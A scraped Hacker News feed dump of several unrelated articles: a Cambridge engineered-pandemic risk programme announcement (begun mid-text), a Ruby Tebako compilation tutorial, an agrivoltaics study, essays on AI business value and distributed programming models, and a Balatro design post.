    This strand will look at the actors who have the potential to engineer harmful pathogens, either deliberately or accidentally. It will ask questions such as: What could motivate bioterrorism in the coming decades? Who might the relevant actors be? What are the kinds of engineered pandemic that someone might want to create?

    Dr Rob Doubleday, Executive Director of the Centre for Science and Policy at the University of Cambridge, said: “The common narrative is that there’s a wide range of potential actors out there who want to create bioweapons but don’t yet have the technical means. But in fact, there’s been very little work to really understand who these people might be, and their relationship to emerging technology. To explore these questions, we need a broad network including social scientists, biosecurity researchers, criminologists, experts in geopolitics and counterterrorism.”

    The strand will also look at the governance of scientific research in areas that may facilitate an engineered pandemic, whether unwittingly or maliciously, aiming to deliver a policy framework that enables freedom of intellectual research while managing real and apparent risk in infectious disease research.

    Professor Bryant said: “As scientists, we’re largely responsible for policing our own work and ensuring integrity, trustworthiness and transparency, and for considering the consequences of new knowledge and how it might be used. But with the rapid progress of genomic technologies and AI, self-regulation becomes more difficult to manage. We need to find governance frameworks that balance essential scientific progress with its potential misapplication.”

    Biological determinants of engineered pandemic threat

    Recognising that the most likely cause of an engineered pandemic would be the deliberate release of a naturally-occurring pathogen – viral or bacterial, for example – rather than a man-made pathogen, this strand aims to understand what might make a particular pathogen infectious and how our immune systems respond to infection. This knowledge will allow researchers to screen currently available drugs to prevent or treat infection and to design vaccines quickly should a pandemic occur.

    Modelling threats and risk management of engineered pandemics

The Covid-19 pandemic highlighted practical problems of dealing with pandemic infections, from the provision of personal protective equipment (PPE) to ensuring a sufficient supply of vaccine doses and availability of key medications. Modelling the potential requirements of a pandemic (how they could be delivered, how ventilation systems could be modified, and what biosafety measures could be taken, for example) is a key challenge for managing any form of pandemic. This strand will address how existing modelling approaches would need to be adapted for a range of plausible engineered pandemics.

    Policy innovation challenges

    Working with the policy community, the Cambridge team will co-create research that directly addresses policy needs and involves policy makers. It will support policy makers in experimenting with more joined-up approaches through testing, learning and adapting solutions developed in partnership.

    The Engineered Pandemics Risk Management Programme is supported by a £5.25 million donation to the Centre for Research in the Arts, Humanities and Social Sciences (CRASSH) at the University of Cambridge. The team intends it to form a central component of a future Pandemic Risk Management Centre, for which it is now fundraising.

    Professor Joanna Page, Director of CRASSH, said: “Cambridge has strengths across a broad range of disciplines – from genetics and immunology to mathematical modelling to existential risk and policy engagement – that can make a much-needed initiative such as this a success.”

    To find out more, visit the Engineered Pandemic Risk Management website.

    ]]>
    https://www.cam.ac.uk/research/news/cambridge-initiative-to-address-risks-of-future-engineered-pandemics hacker-news-small-sites-43196337 Thu, 27 Feb 2025 17:16:32 GMT
    <![CDATA[Simple but great Translation Management Software]]> thread link) | @maximeburri
    February 27, 2025 | https://www.branchlate.com/en | archive.org

    Simplify and accelerate translation management

    Branchlate empowers developers and translators with a streamlined, efficient, and real-time translation process.

    Manage translations with Git branches using the simple CLI. Keep your source of truth aligned with your code.

    Intuitive interface and AI

    With AI-powered suggestions, translators save time by focusing on refining translations.

    Live preview without deployments

    Instantly preview and modify translations on the development environment, without needing a developer or deployment.

    Simple, transparent pricing

    Start with our free trial. No credit card needed.

    Solopreneur

    Perfect for individual entrepreneurs

    • 1,000 auto-translated words per month
    • Standard support
    • Chrome extension
    • Team members
    • Screenshots
    • History

    Startup

    For growing teams and businesses

    • 5,000 auto-translated words per month
    • 24-hour support response time
    • Chrome extension
    • Team members
    • 100 Screenshots / month
    • History

    Enterprise

    For large organizations

    • 10,000 auto-translated words per month
    • 6-hour support response time
    • Chrome extension
    • Team members
    • Unlimited Screenshots
    • History


    ]]>
    https://www.branchlate.com/en hacker-news-small-sites-43196279 Thu, 27 Feb 2025 17:10:19 GMT
    <![CDATA[Compile Ruby Apps with Tebako]]> thread link) | @thunderbong
    February 27, 2025 | https://terminalwire.com/articles/tebako | archive.org

    When I started building Terminalwire, I decided to build it out using Ruby since that’s where I’m most productive and it keeps getting better and faster with every release. I also knew that put me on a path where I’d have to confront the reality that Ruby is notoriously difficult to distribute to users who don’t have Ruby dependencies installed on their machines, which I wrote about last week.

    Fortunately, I found a project called Tebako, which can compile Ruby applications into concise binaries that run on Windows, macOS, and Linux.

    Let’s take a look at how Tebako works in practice for the Terminalwire Client to help you get a better idea of how you might start using it in your Ruby projects.

    Terminalwire is a client-server application that streams terminal commands users enter into their terminal, like tinyzap link create, to a server running the command-line app. The server receives the tokens ["tinyzap", "link", "create"] from the client via WebSockets and processes the command, streaming standard I/O, browser launch commands, and more between the command-line thin client and the command-line parser running on the server.

    In our example, the tinyzap binary isn’t the Tebako binary itself. If you open one of these binaries via cat $(which tinyzap), you’d see something that looks like this:

    #!/usr/bin/env terminalwire-exec
    url: "wss://tinyzap.com/terminal"
    

    The binary terminalwire-exec is the Ruby app I packaged up using Tebako! The Terminalwire executables forward the tinyzap link create command through the terminalwire-exec Tebako binary to the wss://tinyzap.com/terminal endpoint. It turns out it’s not magic; it’s just a different approach to building command-line apps for web apps that I summarize to Rails developers as “Hotwired, but for command-line apps.”
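To make that forwarding concrete, here is a minimal sketch of what a shebang-style launcher receives when you run tinyzap link create. This is my own illustration, not Terminalwire’s actual source; the payload shape and variable names are assumptions:

#!/usr/bin/env ruby
# Hypothetical launcher sketch. The kernel turns `tinyzap link create`
# into: terminalwire-exec /path/to/tinyzap link create
require "yaml"
require "json"

script = ARGV.shift                          # /path/to/tinyzap
config = YAML.safe_load(File.read(script))   # the shebang line parses as a YAML comment
tokens = [File.basename(script)] + ARGV      # ["tinyzap", "link", "create"]

# The real client opens a WebSocket to config["url"] and streams I/O;
# here we only assemble the kind of payload it would need.
puts JSON.generate({ url: config["url"], tokens: tokens })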

    In this article, I’m going to focus on how I used Tebako to package up the terminalwire-exec thin client I implemented in Ruby and distribute it to macOS and Linux users who don’t have Ruby installed on their machines.

Building a Ruby application with Tebako is as straightforward as running the tebako press command.

# --entry-point: script you want to run
# --root:        root of your project folder
# --Ruby:        version of Ruby you want to package
# --output:      name of the binary file
tebako press \
  --entry-point hello.rb \
  --root . \
  --Ruby 3.4.2 \
  --output howdy

    The way it works is pretty cool–application files are packaged up using DwarFS, which is a read-only file system Tebako compiles into the Ruby binary and loads from memory when it’s executed.

Let’s go back to Ruby. In the example above, you selected Ruby 3.4.2, which is the most current version of Ruby at the time of writing. Tebako starts compiling Ruby like any compiler would, but then it patches the part of Ruby that starts running scripts so that it loads from DwarFS, beginning with the entry-point file from the command line above.

    When it’s all said and done, you get a single Ruby binary that runs the hello.rb file you specified from DwarFS when users run howdy.
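For completeness, the entry point can be any ordinary Ruby script; a trivial, hypothetical hello.rb for the build above might look like:

# hello.rb -- hypothetical entry point for the `tebako press` example above.
# Everything reachable from this file under --root (vendored gems included)
# gets baked into the in-memory DwarFS image inside the binary.
puts "Howdy from Ruby #{RUBY_VERSION}!"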

    15 megabyte binaries

    The most pleasant surprise I encountered with Tebako is the size of the binaries. terminalwire-exec ended up being roughly 14-15 megabytes.

    Terminalwire binaries weigh in at 15 megabytes

    Just to give you an idea of how that stacks up against some other popular command-line tools, Heroku’s Homebrew heroku app weighs in at 452.3 MB and GitHub’s gh app is 46.3 MB.

    Docker containers

    For those who don’t want to install the Ruby dependencies on their workstations for Tebako builds, there are a few Dockerfiles Tebako maintains that are designed to run locally on your workstations and in CI environments.

For Terminalwire, I didn’t end up using these containers because they didn’t fit into my CI workflow. More on that later.

    Cross-platform compilations

    Building cross-platform binaries is a bit more challenging with Tebako than languages like Go. The main challenge is you have to compile the Tebako package on the operating system and architecture you’re targeting.

    If the platforms GitHub Actions supports are enough to cover the platforms you’re targeting, that’s pretty easy. At the time of this writing GitHub Actions supports arm64 macOS, x86_64 Linux, and arm64 Linux out of the box, but for Terminalwire I needed to support x86_64 macOS builds.

    To get that working, I pulled my 2016 MacBook Pro out of the closet, turned it on, installed macOS 13, set up a development environment, and got Tebako building binaries for that platform. It took a bit of work getting that environment set up, but once it was up and running it was quite easy to compile Tebako x86_64 macOS builds.

    DwarFS, paths, and $PROGRAM_NAME

One thing to keep in mind when you start using Tebako is how paths work. Remember how Ruby files are compiled into the binary via DwarFS? Those files live in an in-memory file system compiled into the Ruby binary. That means if your Ruby app needs to know the location of a file within itself, you’ll get back paths prefixed with /__tebako_memfs__.

    ./howdy
    irb(main):001> __FILE__
    => "/__tebako_memfs__/bin/hello.rb"
    

    I’m pretty sure this is a problem unique to the Terminalwire client, but it needs to know the name of the running binary to send to the Terminalwire server so it can be used to process a command. To my surprise, $PROGRAM_NAME gave me the path of the entry-point file:

    ./howdy
    irb(main):001> $PROGRAM_NAME
    => "/__tebako_memfs__/bin/hello.rb"
    

    Instead of the expected name of the binary.

    ./howdy
    irb(main):001> $PROGRAM_NAME
    => "howdy"
    

The good news is I opened an issue on their repo and there are a few opinions flying around about how that should behave and be implemented.

    Packaging scenarios

One thing I’m not a huge fan of with Tebako is the packaging scenarios. The tebako press command will build projects differently depending on the entry point and files passed into it, which I think does “too much magic”.

    A screenshot of the Tebako packaging scenarios table

    Since Terminalwire is a monorepo with multiple gems, it took me a while to figure out which directory I had to pass into tebako press to get a binary out the other side. My CI pipeline currently uses the “packaged gem” scenario, which means I need to cut releases of my gem to RubyGems before building a Tebako executable. This complicates my pre-release CI workflow since I have to release *.*.*.alpha* gems, but it does get a Tebako build out the door.

When I start seriously considering using an open source project in my own work, I edit the README in areas that I think could be clearer or more helpful for the next person that comes along, then I open a PR to see what it’s like getting a change merged into the repo.

    As I started running into some of the issues I discussed above, I opened issues in GitHub with reproduction steps and various contributors were helpful in recreating the problem or understanding that it’s a “works on my machine” type of problem.

    Overall, I’ve had positive experiences working with the Tebako community.

    Overall I’m very pleased with Tebako. The community is responsive and pragmatic, the project has a vision, and it gives me reasonably sized binaries that I can run on many different platforms.

    The 15 megabyte binary file size for terminalwire-exec exceeded my expectations and it runs well on many different platforms.

    Setting up the continuous integration workflow for my requirements was a bit challenging and required more manual work, but as I get more iterations in with my pipeline and work with the project, I’m confident I’ll end up with a highly automated and repeatable build pipeline.

    I hope the Ruby community takes notice and starts doing the forbidden thing you’re not supposed to do–distribute Ruby applications to end users. If more people do it then I’m confident Tebako will only get better.

    Support this blog 🤗

    If you like what you read and want to see more articles like this, please consider using Terminalwire for your web application’s command-line interface. In under 10 minutes you can build a command-line in your favorite language and web framework, deploy it to your server, then stream it to the Terminalwire thin-client that runs on your users desktops. Terminalwire manages the binaries, installation, and updates, so you can focus on building a great CLI experience.

    ]]>
    https://terminalwire.com/articles/tebako hacker-news-small-sites-43196244 Thu, 27 Feb 2025 17:07:41 GMT
    <![CDATA[Harvest the sun twice: Agrivoltaics promises sustainable food, energy and water]]> thread link) | @gnabgib
    February 27, 2025 | https://www.sheffield.ac.uk/news/harvesting-sun-twice-agrivoltaics-shows-promise-sustainable-food-energy-and-water-management-east | archive.org

    Combining solar power production with agriculture can significantly boost crop yields, conserve water and generate low-carbon electricity for areas particularly vulnerable to climate change, a new study has shown.

    • A new international study, led by the University of Sheffield, found using the same land for both solar energy production and agriculture can generate low-carbon electricity, improve crop yields and reduce water loss 
    • The method, known as agrivoltaics, offers a sustainable solution to the pressing challenges of food insecurity, water scarcity, and energy poverty
• By shading crops with solar panels, agrivoltaics creates a microclimate helping certain plants, like beans and maize, to thrive whilst needing less irrigation
    • Agrivoltaics can also provide a reliable source of clean energy for rural communities 


    Research led by the University of Sheffield reveals agrivoltaics - the practice of using the same land for farming and to produce solar electricity - leads to greater crop yields with less water than crops grown in open fields.

    The international team, led by Sheffield scientists in collaboration with the Center for International Forestry Research and World Agroforestry (CIFOR-ICRAF), Sustainable Agriculture Tanzania, Latia Agribusiness Solutions and the University of Arizona, found certain crops, such as maize, Swiss chard and beans, thrived under the partial shade provided by solar panels.  

    The shade also helped to reduce water loss through evaporation, leading to more efficient water usage. Additionally, rainwater harvested from the panels could be used to supplement irrigation needs.

Senior author of the study, Professor Sue Hartley from the University of Sheffield’s School of Biosciences and Vice-President for Research and Innovation, said: “Imagine a future where farms are powered by clean energy and crops are more resilient to climate change. Agrivoltaics can make this vision a reality by offering a sustainable solution to the pressing challenges of food insecurity, water scarcity, and energy poverty.

    “By shading crops with solar panels, we created a microclimate that helped certain crops produce more, but they were also better able to survive heat waves and the shade helped conserve water, which is crucial in a region severely threatened by climate change.”

    Beyond increased crop yields and water conservation, the study showed agrivoltaics can also provide a reliable source of clean energy for rural communities. Off-grid solar power systems can power homes, businesses, and agricultural equipment, improving the quality of life for many.

    Lead author of the study, Dr Richard Randle-Boggis, who conducted the research at the University of Sheffield and is now a research scientist at SINTEF, said: “By combining solar panels and farming, we were able to get more from the land. This multifunctional approach shows the potential of agrivoltaics to boost food production and clean electricity generation while reducing the need for irrigation. 

    “However, it's important to remember that one size doesn't fit all. We need to tailor these systems to specific locations, especially in hot and dry climates.”

    To view the full paper, please visit: Science Direct

    ]]>
    https://www.sheffield.ac.uk/news/harvesting-sun-twice-agrivoltaics-shows-promise-sustainable-food-energy-and-water-management-east hacker-news-small-sites-43196133 Thu, 27 Feb 2025 16:56:14 GMT
    <![CDATA[Climbing the AI Layer Cake]]> thread link) | @whakim
    February 27, 2025 | https://halcyon.eco/blog/climbing-the-ai-layer-cake | archive.org

    Climbing the AI Layer Cake


    Today's Machine Readable entry is a collaboration between Nat Bullard and Will Hakim, Staff Software Engineer, Halcyon

If you’ve been paying attention to large language model (LLM) benchmarks, the past few months have been as astounding as any since the debut of GPT-3 back in 2022: OpenAI’s o3 producing a step-function improvement on ARC-AGI; DeepSeek’s R1 catching up to – and in some cases, surpassing – OpenAI’s o1 at a fraction of the cost; and Anthropic’s steady drumbeat of impressive model announcements, most recently Claude 3.7 Sonnet.

To use a firsthand example, while LLMs have made massive strides in code generation, they still require a software engineer to conceptualize what they’re trying to build and to articulate that concept in a written text prompt. This disconnect between the advances in foundational technology and the utility of its applications has led us to reflect on past technological transformations and how companies throughout the AI ecosystem should think about positioning themselves to create value in the midst of such a shift.

    Our conviction is that AI will be widely available, constantly improving, hard to differentiate at its basic level, and priced competitively and according to specific demand. Equally importantly, it will be part of a process of transforming something of lower value into something else of higher value. And within that transformation, it raises a question: to whom does value accrue in this transformation process?

    To explore this idea, we batted around three possibilities about how AI with these attributes could manifest in business. 

    The new loom

    A concept predating the digital era: is AI the new power loom? The power loom changed a craft - the making of fabric, often at home, using a device but in a highly personal fashion - into an industry. The power loom transformed what had been a home activity and a small financial undertaking into something done at sufficient scale for the creation of mass-manufactured sales and exports.

    A change of scale is also a change of scope. An industrial loom didn’t just do the work of many handloom operators - it did it more consistently, and without the same dexterity required. Labor did not go away, but it became different - less about skill in creating a product, and more about skill in maintaining the machine. 

In this vision for AI, the machine / process is extremely powerful, but it delivers very little value to the operator while sending a great deal to the owner. The owner is quite literally an owner, too, of a physical machine and all of the apparatus needed to energize and sustain it. But value also accrues to those who use not just the process (the loom) but the output (the fabric), and even further to those who use that output as their own input (apparel makers).


    The new spreadsheet 

    Another concept we debated: is business-focused artificial intelligence the next spreadsheet? Spreadsheets were the killer app for an initial subset of customers (finance and accounting professionals) and also a (if not the) killer app for the Apple II when VisiCalc, the first spreadsheet for a personal computer, was released in 1979. 

    The spreadsheet was born with one use case and one target market, but it has since become a framework for all sorts of things. Finance, obviously, is still paramount, but spreadsheets are also used for tasks as basic as lists or schedules. It would be hard to say that a spreadsheet is the killer app for a computer today, even if it is essential to workflows across multiple industries. 

    But where does the value in being essential lie? Killer app status was not enough for VisiCalc to persist. Microsoft Excel, introduced in 1985, is still with us today as part of Microsoft’s $77 billion annual revenue Productivity and Business Processes business line. But, that business is now smaller than Microsoft’s cloud business. And, it has a direct (and free) competitor in the form of Google Sheets.

    We think of its value then, in two ways. The first is in the value it creates for its creator (Microsoft) which is tens of billions of dollars of annual recurring revenue. The second is in the value that it enables for its customers. What has been more valuable: encoding the first =SUMIF() capability, or building something with it? To put it in revenue terms: has Microsoft made more money since 1985 selling Excel, than the world’s financial and professional services firms have earned using it in the same time? 

    The new smartphone

Another idea: is AI the new smartphone? Mobile phones existed for decades and sold in the billions before the iPhone arrived and transformed mobile telephony. Prior to 2007, mobile phones (such as the BlackBerry) could download and operate software (or, ringtones), take photos, send and receive emails, and operate social networks. But it was the release of the iPhone and App Store, and the subsequent explosion of equally capable devices, that created a universe of new businesses and new values.

    Ubiquitous cameras enabled companies such as Instagram. Device-level, personal geolocation enabled companies as prosaic as Foursquare and as disruptive as Uber. A galaxy of hardware (not just chipsets and cameras but antennas and accelerometers) came together to enable a universe of new businesses built on the combination and concert of other technologies.  

    In this imagination, AI is the coordinating layer for all sorts of disparate activities in one frame. Much like an app store, it is a place where people deliver services, ranging from extremely tailored to nearly universal. Much like a device in one’s pocket, it is always on and always available. It is the interface between highly specialized hardware and often-specific software and us, but even still it is only one layer of many in value creation. 

    The new force multiplier

    These historical examples show how transformative applications amplify existing human activities to unprecedented speed and scope. The power loom didn't invent textile production — it made it possible at industrial scale, transforming what was once artisanal into something that could clothe nations. Spreadsheets didn't create financial analysis — they democratized it, allowing complex modeling that previously required teams of accountants. Smartphones didn't invent photography or transportation — they made them instantly accessible, turning occasional activities into daily habits. In each case, the technology served as a force multiplier for established human needs, creating exponential value not by inventing new activities but by removing friction from existing ones.

    That's the promise we’re pursuing at Halcyon: not to replace human expertise, but to dramatically amplify it, allowing energy professionals to achieve outcomes that would have been impractical or impossible before. The most enduring value comes from this amplification — not from incremental improvements to the underlying technology itself.

    Comments or questions? We’d love to hear from you - sayhi@halcyon.eco, or find us on LinkedIn and Twitter

    ]]>
    https://halcyon.eco/blog/climbing-the-ai-layer-cake hacker-news-small-sites-43196066 Thu, 27 Feb 2025 16:49:14 GMT
    <![CDATA[macOS Tips and Tricks]]> thread link) | @signa11
    February 27, 2025 | https://saurabhs.org/macos-tips | archive.org

    Unable to extract article]]>
    https://saurabhs.org/macos-tips hacker-news-small-sites-43195773 Thu, 27 Feb 2025 16:20:17 GMT
    <![CDATA[When Did They Die?]]> thread link) | @docdeek
    February 27, 2025 | https://www.whentheydied.com/play?HN | archive.org

    Unable to retrieve article]]>
    https://www.whentheydied.com/play?HN hacker-news-small-sites-43195743 Thu, 27 Feb 2025 16:17:05 GMT
    <![CDATA[Distributed systems programming has stalled]]> thread link) | @shadaj
    February 27, 2025 | https://www.shadaj.me/writing/distributed-programming-stalled | archive.org

    Over the last decade, we’ve seen great advancements in distributed systems, but the way we program them has seen few fundamental improvements. While we can sometimes abstract away distribution (Spark, Redis, etc.), developers still struggle with challenges like concurrency, fault tolerance, and versioning.

    There are lots of people (and startups) working on this. But nearly all focus on tooling to help analyze distributed systems written in classic (sequential) programming languages. Tools like Jepsen and Antithesis have advanced the state-of-the-art for verifying correctness and fault tolerance, but tooling is no match for programming models that natively surface fundamental concepts. We’ve already seen this with Rust, which provides memory safety guarantees that are far richer than C++ with AddressSanitizer.

    If you look online, there are tons of frameworks for writing distributed code. In this blog post, I’ll make the case that they only offer band-aids and sugar over three fixed underlying paradigms: external-distribution, static-location, and arbitrary-location. We’re still missing a programming model that is native to distributed systems. We’ll walk through these paradigms then reflect on what’s missing for a truly distributed programming model.


    External-distribution architectures are what the vast majority of “distributed” systems look like. In this model, software is written as sequential logic that runs against a state management system with sequential semantics:

    • Stateless Services with a Distributed Database (Aurora DSQL, Cockroach)
• Services using gossiped CRDT state (Ditto, ElectricSQL, Redis Enterprise)1
    • Workflows and Step Functions

These architectures are easy to write software in, because none of the underlying distribution is exposed2 to the developer! Although this architecture results in a distributed system, we do not have a distributed programming model.

    There is little need to reason about fault-tolerance or concurrency bugs (other than making sure to opt into the right consistency levels for CRDTs). So it’s clear why developers opt for this option, since it hides the distributed chaos under a clean, sequential semantics. But this comes at a clear cost: performance and scalability.

    Serializing everything is tantamount to emulating a non-distributed system, but with expensive coordination protocols. The database forms a single point of failure in your system; you either hope that us-east-1 doesn’t go down or switch to a multi-writer system like Cockroach that comes with its own performance implications. Many applications are at sufficiently low scale to tolerate this, but you wouldn’t want to implement a counter like this.
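For contrast, here is a minimal sketch, in Ruby and of my own making rather than from any library named above, of the coordination-free counter that CRDT-based systems provide: each replica increments only its own slot, and replicas merge by element-wise maximum, so no serialization point is needed.

# Grow-only counter (G-counter) CRDT sketch.
class GCounter
  attr_reader :counts

  def initialize
    @counts = Hash.new(0)   # node_id => increments observed from that node
  end

  def increment(node_id, by = 1)
    @counts[node_id] += by  # a replica only ever bumps its own slot
  end

  def value
    @counts.values.sum      # the counter's value is the sum across all slots
  end

  def merge(other)
    # Element-wise max is commutative, associative, and idempotent,
    # so replicas can gossip state in any order without coordination.
    other.counts.each { |node, n| @counts[node] = [@counts[node], n].max }
    self
  end
end

a = GCounter.new
b = GCounter.new
a.increment(:a)      # concurrent increments on two replicas
b.increment(:b, 2)
a.merge(b)
puts a.value         # => 3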


    Static-location architectures are the classic way to write distributed code. You compose several units—each written as local (single-machine) code that communicates with other machines using asynchronous network calls:

    • Services communicating with API calls, possibly using async / await (gRPC, REST)
    • Actors (Akka, Ray, Orleans)
    • Services polling and pushing to a shared pub/sub (Kafka)

    These architectures give us full, low-level control. We’re writing a bunch of sequential, single-machine software with network calls. This is great for performance and fault-tolerance because we control what gets run where and when.

    But the boundaries between networked units are rigid and opaque. Developers must make one-way decisions on how to break up their application. These decisions have a wide impact on correctness; retries and message ordering are controlled by the sender and unknown to the recipient. Furthermore, the language and tooling have limited insight into how units are composed. Jump-to-definition is often unavailable, and serialization mismatches across services can easily creep in.

    Most importantly, this approach to distributed systems fundamentally eliminates semantic co-location and modularity. In sequential code, things that happen one after the other are textually placed one after the other and function calls encapsulate entire algorithms. But with static-location architectures, developers are coerced to modularize code on machine boundaries, rather than on semantic boundaries. In these architectures there is simply no way to encapsulate a distributed algorithm as a single, unified semantic unit.

    Although static-location architectures offer developers the most low-level control over their system, in practice they are difficult to implement robustly without distributed systems expertise. There is a fundamental mismatch between implementation and execution: static-location software is written as single-machine code, but the correctness of the system requires reasoning about the fleet of machines as a whole. Teams building such systems often live in fear of concurrency bugs and failures, leading to mountains of legacy code that are too critical to touch.


Arbitrary-location architectures are the foundation of most “modern” approaches to distributed systems. These architectures simplify distributed systems by letting us write code as if it were running on a single machine, but at runtime the software is dynamically executed across several machines3:

    • Distributed SQL Engines
    • MapReduce Frameworks (Hadoop, Spark)
    • Stream Processing (Flink, Spark Streaming, Storm)
    • Durable Execution (Temporal, DBOS, Azure Durable Functions)

    These architectures elegantly handle the co-location problem since there are no explicit network boundaries in the language/API to split your code across. But this simplicity comes at a significant cost: control. By letting the runtime decide how the code is distributed, we lose the ability to make decisions about how the application is scaled, where the fault domains lie, and when data is sent over the network.

Just like the external-distribution model, arbitrary-location architectures often come with a performance cost. Durable execution systems typically snapshot their state to a persistent store between every step4. Stream processing systems may dynamically persist data and are free to introduce asynchrony across steps. SQL users are at the mercy of the query optimizer, to which they at best can only give “hints” on distribution decisions.

    We often need low-level control over where individual logic is placed for performance and correctness. Consider implementing Two-Phase Commit. This protocol has explicit, asymmetric roles for a leader that broadcasts proposals and workers that acknowledge them. To correctly implement such a protocol, we need to explicitly assign specific logic to these roles, since quorums must be determined on a single leader and each worker must atomically decide to accept or reject a proposal. It’s simply not possible to implement such a protocol in an arbitrary-location architecture without introducing unnecessary networking and coordination overhead.
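To make those asymmetric roles concrete, here is a toy, single-process sketch in Ruby, with threads and queues standing in for the network; it is my own illustration of the protocol’s shape, not a production implementation:

# Toy two-phase commit: one coordinator, N workers, queues as "the network".
N = 3
to_workers = Array.new(N) { Queue.new }
to_coord   = Queue.new

workers = N.times.map do |i|
  Thread.new do
    to_workers[i].pop                  # phase 1: receive the proposal
    vote = rand > 0.2 ? :yes : :no     # each worker decides locally and atomically
    to_coord << vote
    decision = to_workers[i].pop       # phase 2: receive the decision
    puts "worker #{i}: voted #{vote}, decision #{decision}"
  end
end

# Coordinator role: broadcast the proposal, tally votes on a single
# machine, then broadcast the commit/abort decision.
to_workers.each { |q| q << :proposal }
votes    = N.times.map { to_coord.pop }
decision = votes.all? { |v| v == :yes } ? :commit : :abort
to_workers.each { |q| q << decision }
workers.each(&:join)
puts "coordinator: #{decision}"

Even in this toy, the quorum is tallied in one place and each worker’s vote is a local, atomic step; pinning those steps to specific roles is exactly the control an arbitrary-location runtime takes away.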

    If you’ve been following the “agentic” LLM space, you might be wondering: “Are any of these issues relevant in a world where my software is being written by an LLM?” If the static-location model is sufficiently rich to express all distributed systems, who cares if it’s painful to program in!

I’d argue that LLMs actually are a great argument why we need a new programming model. These models famously struggle under scenarios where contextually-relevant information is scattered across large bodies of text5. LLMs do best when semantically-relevant information is co-located.

    The static-location model forces us to split up our semantically-connected distributed logic across several modules. LLMs aren’t great yet at correctness on a single machine; it is well beyond their abilities to compose several single-machine programs that work together correctly. Furthermore, LLMs make decisions sequentially; splitting up distributed logic across several networked modules is inherently challenging to the very structure of AI models.

    LLMs would do far better with a programming model that retains “semantic locality”. In a hypothetical programming model where code that spans several machines can be co-located, this problem becomes trivial. All the relevant logic for a distributed algorithm would be right next to each other, and the LLM can generate distributed logic in a straight-line manner.

The other piece of the puzzle is correctness. LLMs make mistakes, and our best bet is to combine them with tools that can automatically find them6. Sequential models have no way to reason about the ways distributed execution might cause trouble. But a sufficiently rich distributed programming model could surface issues arising from network delays and faults (think a borrow-checker, but for distributed systems).

    Although the programming models we’ve discussed each have several limitations, they also demonstrate desirable features that a native programming model for distributed systems should support. What can we learn from each model?

    I’m going to skip over external-distribution, which as we discussed is not quite distributed. For applications that can tolerate the performance and semantic restrictions of this model, this is the way to go. But for a general distributed programming model, we can’t keep networking and concurrency hidden from the developer.

    The static-location model seems like the right place to start, since it is at least capable of expressing all the types of distributed systems we might want to implement, even if the programming model offers us little help in reasoning about the distribution. We were missing two things that the arbitrary-location model offered:

    • Writing logic that spans several machines right next to each other, in a single function
    • Surfacing semantic information on distributed behavior such as message reordering, retries, and serialization formats across network boundaries

Each of these points has a dual, something we don’t want to give up:

    • Explicit control over placement of logic on machines, with the ability to perform local, atomic computations
    • Rich options for fault tolerance guarantees and network semantics, without the language locking us into global coordination and recovery protocols

    It’s time for a native programming model—a Rust-for-distributed systems, if you will—that addresses all of these.

    Thanks to Tyler Hou, Joe Hellerstein, and Ramnivas Laddad for feedback on this post!

    1. This may come as a surprise. CRDTs are often marketed as a silver bullet for all distributed systems, but another perspective is they simply accelerate distributed transactions. Software running over CRDTs is still sequential.

    2. Well that’s the idea, at least. Serializability typically isn’t the default (snapshot isolation is), so concurrency bugs can sometimes be exposed.

3. Actor frameworks don’t really count even if they support migration, since the developer still has to explicitly define the boundaries of an actor and specify where message passing happens.

    4. With some optimizations when a step is a pure, deterministic function

    5. See the Needle in a Haystack Test; reasoning about distributed systems is even harder.

    6. Lean is a great example of this in action. Teams including Google and Deepseek have been using it for some time.

    ]]>
    https://www.shadaj.me/writing/distributed-programming-stalled hacker-news-small-sites-43195702 Thu, 27 Feb 2025 16:12:42 GMT
    <![CDATA[Is It an AWS EC2 Instance or a US Visa?]]> thread link) | @alach11
    February 27, 2025 | https://rahmatashari.com/app/ec2-visa-quiz | archive.org

    Unable to extract article]]>
    https://rahmatashari.com/app/ec2-visa-quiz hacker-news-small-sites-43195517 Thu, 27 Feb 2025 15:54:40 GMT
    <![CDATA[Solitaire]]> thread link) | @goles
    February 27, 2025 | https://localthunk.com/blog/solitaire | archive.org

    I have cited a few games as inspiration for Balatro in the past, but I wanted to talk about one in particular that hasn’t been mentioned much that arguably is the most important.

    I think if I had some kind of Balatro vision board, solitaire (Klondike) would be right in the middle of it with a big red circle around it. You can probably see some of the similarities between my game and the classic solo card game. I wanted my game to have the same vibe.

    If you’re somehow unfamiliar, solitaire is a group of card games characterized by solo play. Klondike is usually the variant that most people in the west associate with solitaire, but one could argue even Balatro is technically a solitaire game. Traditional solitaire games exist at the peak of game culture for me. These games are so ubiquitous and accepted by society that almost everyone has some memory of playing them. They have transcended gaming culture more than even the biggest IPs (like Tetris or Mario), and they occupy this very interesting wholesome niche. Solitaire is almost viewed as a positive pastime more than a game. That feeling interests me greatly as a game designer.

    As Balatro 1.0 development drew nearer to a close in early 2024, I found myself picturing the type of person that might play my game and what a typical play session might look like for them. My fantasy was that I was playing this weird game many years later on a lazy Sunday afternoon; I play a couple of runs, enjoy my time for about an hour, then set it down and continue the rest of my day. I wanted it to feel evergreen, comforting, and enjoyable in a very low-stakes way. I think that’s one of the reasons why there isn’t a player character, health, or classic ‘enemies’ in the game as well. I wanted this game to be as low stakes as a crossword or a sudoku puzzle while still exercising the problem solving part of the brain.

    Essentially I wanted to play Balatro like people play solitaire.

    One of the main ways that the vibe of solitaire and my own game differ is in the meta-game Balatro has that solitaire does not. Things like achievements, stake levels, unlocks, and challenges certainly can be looked at as a way to artificially inflate playtime, but those things were added for two other reasons I was more concerned about:

    1. To force players to get out of their comfort zone and explore the design of the game in a way they might not if this were a fully unguided gaming experience. In solitaire this probably isn’t super useful because the game has far fewer moving parts, so the player can figure everything out by themselves, but I don’t think that’s the case with a game like Balatro. I feel like even I learned a lot from these guiding goals that I wasn’t anticipating many months after the game launched.

    2. To give the players that already enjoy the game loop a sort of checklist to work through if they so choose. They can come up with a list of goals on their own (as I see many from the community have) but I do really appreciate when I play other games and they give me tasks to accomplish and shape my long-form play around while I enjoy the shorter play sessions individually.

    It’s now been over a year since launch and I am still playing Balatro almost daily. I play a couple runs before I go to bed, and I feel like I just might have accomplished the task of recreating the feeling of playing solitaire for myself. Seeing the discourse around my game has me fairly convinced that this is decidedly not how the average player has been interacting with my game, but I’m still thrilled that people are having a great time with it and I’m even more happy that I feel like this game turned out how I wanted as a player myself.

    This is why you might have seen me refer to this game as ‘jazz solitaire’ in the past. I wanted to bring the old feeling of solitaire into a game with modern design bells and whistles, creating something new and yet familiar. Only time will tell if I actually accomplished that.

    ]]>
